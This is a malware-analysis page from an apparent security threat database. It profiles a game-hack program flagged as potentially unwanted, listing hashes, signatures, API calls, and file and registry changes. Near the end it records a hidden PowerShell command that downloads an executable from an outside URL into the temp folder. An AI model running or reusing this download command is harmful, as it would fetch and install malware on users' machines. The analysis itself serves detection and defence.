Multi-License Discount Quote

Change Region

English
Threat Database Potentially Unwanted Programs PUP.Gamehack.GSO

PUP.Gamehack.GSO

By CagedTech in Potentially Unwanted Programs

Analysis Report

General information

Family Name: PUP.Gamehack.GSO
Signature status: No Signature

Known Samples

MD5: a7668609025ed001fad36544c0d4a50a
SHA1: 29f38e796e69b63b639bc1ca1fa28b87d34bdde5
SHA256: 75656681E5CF08D2AF0AD8F3A2BB88A8974C770D94F4BBD16B8DBD7975D2505A
File Size: 749.06 KB, 749056 bytes
MD5: 611362bc4aa194c52db4c95555d2b2b8
SHA1: bfd624709a48b3ddfd1c99500c670323e60545f0
SHA256: 5502060679AB6453EE97C27A07D9BA559061DF4B934C89AD3AD7D201A5D001E6
File Size: 9.64 MB, 9637552 bytes
MD5: 391b4d88bed80c0af1a4b2a82a7fd75f
SHA1: de029ce807430a4c2cd5ed087be9208b80d34e6e
SHA256: 3C040644F07FC00668D94B72AEAC0978496B9D168C6136E75EE3FF6950E4F84D
File Size: 8.50 MB, 8497664 bytes
MD5: f2d1bb13f3a555ba438bc6a1d85f2ac6
SHA1: c29a5e0e0991bc178c214da4ca55417389f2877f
SHA256: C682E74B5228290F5D4E6BFD2FF29B200D601133109FED64271E3866AA4F6C9A
File Size: 5.92 MB, 5924352 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 64-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
Show More
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Company Name Minkio Software
File Description Game Overlay Renderer
File Version 1.4.2.0
Internal Name MinkioOverlay
Legal Copyright Copyright (C) 2025 Minkio Software
Original Filename MinkioExternal.exe
Product Name Minkio Overlay
Product Version 1.4.2

Digital Signatures

Signer Root Status
Areeb Ahmed Code Signing LLC Areeb Ahmed Code Signing LLC Self Signed
Microsoft Corporation Microsoft Code Signing PCA 2011 Hash Mismatch
Microsoft Windows Software Compatibility Publisher Microsoft Windows Third Party Component CA 2013 Hash Mismatch

File Traits

  • dll
  • HighEntropy
  • imgui
  • ntdll
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 18,786
Potentially Malicious Blocks: 956
Whitelisted Blocks: 15,075
Unknown Blocks: 2,755

Visual Map

0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? 0 0 0 ? 0 0 0 ? 0 0 0 x 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 x 0 0 0 0 0 ? ? 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 ? x ? ? 0 0 0 0 0 x 0 0 x 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 ? ? 0 ? 0 0 0 0 ? ? ? ? ? x 0 0 0 0 ? 0 0 0 ? 0 x 0 0 ? x ? ? ? 0 0 x 0 x 0 ? x 0 0 0 0 0 0 ? 0 ? ? ? ? 0 ? 0 0 0 0 0 ? 0 ? ? 0 0 ? 0 x x 0 0 0 0 0 0 0 0 0 0 ? ? 0 ? 0 0 0 0 ? ? ? ? ? x 0 ? ? ? 0 ? x ? x 0 0 0 ? 0 0 x ? 0 x ? x ? ? ? ? 0 ? 0 0 0 0 0 ? ? ? ? x 0 0 0 0 0 ? ? 0 0 ? 0 0 ? 0 0 0 ? 0 0 0 0 ? 0 0 ? 0 ? 0 0 ? 0 0 x x 0 0 0 ? 0 ? ? ? ? ? ? 0 0 ? ? ? 0 0 ? ? 0 0 ? 0 0 x 0 x 0 ? ? ? 0 0 ? ? x 0 x ? x x x 0 0 0 0 ? 0 ? ? 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 ? 0 ? ? ? ? ? ? 0 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 x 0 x x 0 ? 0 ? 0 ? ? ? ? ? ? ? ? 0 0 ? 0 ? 0 0 ? 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 0 ? 0 ? ? 0 ? x ? 0 x 0 0 0 x 0 0 0 0 0 x ? 0 0 0 0 ? ? 0 0 0 0 ? ? 0 0 0 0 ? 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 ? 0 ? 0 0 0 0 ? 0 0 0 0 ? 0 0 ? ? 0 0 ? 0 ? 0 ? x x x ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 ? ? 0 0 0 ? x x 0 0 0 0 ? 0 ? ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 ? ? ? x 0 0 0 ? 0 0 ? ? ? 0 0 0 ? ? 0 0 ? 0 0 ? 0 0 ? ? 0 0 ? 0 0 ? 0 ? 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 ? 0 0 ? 0 0 ? ? 0 0 0 0 0 ? ? 0 0 ? ? 0 0 0 0 ? ? 0 0 0 0 x x ? 0 0 ? 0 0 ? ? ? ? ? 0 ? ? 0 ? ? 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 ? 0 ? 0 0 x ? ? ? ? ? 0 ? ? ? ? 0 0 0 x ? 0 0 0 0 ? ? x ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 ? 0 0 0 ? 0 ? ? 0 0 0 0 0 0 ? ? 0 ? 0 0 0 0 ? ? 0 0 0 0 0 ? ? 0 0 0 0 0 ? ? ? 0 ? ? ? 0 0 ? 0 0 0 0 ? ? 0 x x x ? ? ? 0 ? ? 0 0 0 ? 0 0 0 ? 0 0 0 ? 0 ? 0 ? ? ? ? ? ? 0 0 0 0 0 0 ? ? ? ? ? 0 0 0 0 0 0 ? 0 0 x ? 0 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 0 0 ? ? ? ? ? 0 ? ? 0 0 0 0 0 0 0 0 0 ? 0 0 x ? 0 ? ? ? 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 ? x x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 ? 0 0 ? 0 0 0 ? 0 0 0 0 ? ? 0 ? x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x x ? ? x 0 0 0 x 0 0 0 0 0 0 0 ? 0 ? 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 x ? 0 0 x ? 0 0 ? 0 0 ? ? ? ? 0 0 ? ? ? ? 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 ? 0 x 0 ? ? ? ? ? 0 0 0 0 0 0 0 0 0 ? ? ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 ? 0 0 0 0 0 0 ? ? ? ? 0 0 0 ? 0 0 0 0 0 0 0 ? 0 0 0 x 0 0 0 0 0 0 0 0 ? 0 0 ? ? 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 ? 0 0 0 0 0 ? 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 ? x 0 ? ? 0 0 ? ? ? 0 0 0 0 x 0 0 x x 0 0 0 0 0 0 0 0 0 ? 0 0 ? 0 ? ? 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 ? x 0 0 x x 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 ? ? ? ? 0 0 0 ? 0 0 0 ? 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 x x ? ? x ? 0 ? 0 ? 0 0 0 0 0 0 0 0 0 ? x ? ? 0 0 0 0 0 x 0 0 x 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 ? 0 0 ? ? 0 0 0 ? 0 0 0 x 0 0 0 x 0 ? 0 x 0 0 0 x 0 0 x x ? 0 x 0 x 0 x 0 0 0 0 0 ? 0 ? 0 0 ? 0 0 0 ? ? ? 0 0 0 0 0 ? 0 ? ? ? ? 0 0 x 0 x 0 ? x 0 0 0 0 0 0 ? x ? ? 0 0 0 0 0 0 0 0 ? x x ? 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? ? 0 ? ? ? 0 0 0 0 0 x 0 x 0 0 0 0 ? 0 ? ? ? 0 x x ? 0 ? ? ? 0 ? 0
... Data truncated
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Gamehack.GSR
  • RobloxHack.LE
  • RobloxStealer.B

Files Modified

File Attributes
\device\namedpipe\gmdasllogger Generic Write,Read Attributes
\device\namedpipe\pshost.134232212191987039.5588.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\temp\__psscriptpolicytest_2hf4aavw.xmg.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_x4wcpang.hwm.psm1 Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 梀屧ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 㣙岽ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 鬓岿ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
Show More
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueryWnfStateNameInformation
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetSystemInformation
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSetTimerEx
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess

15 additional items are not displayed above.

Process Manipulation Evasion
  • NtUnmapViewOfSection
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Shell Execute
  • CreateProcess
Process Terminate
  • TerminateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe

Trending

Most Viewed

Loading...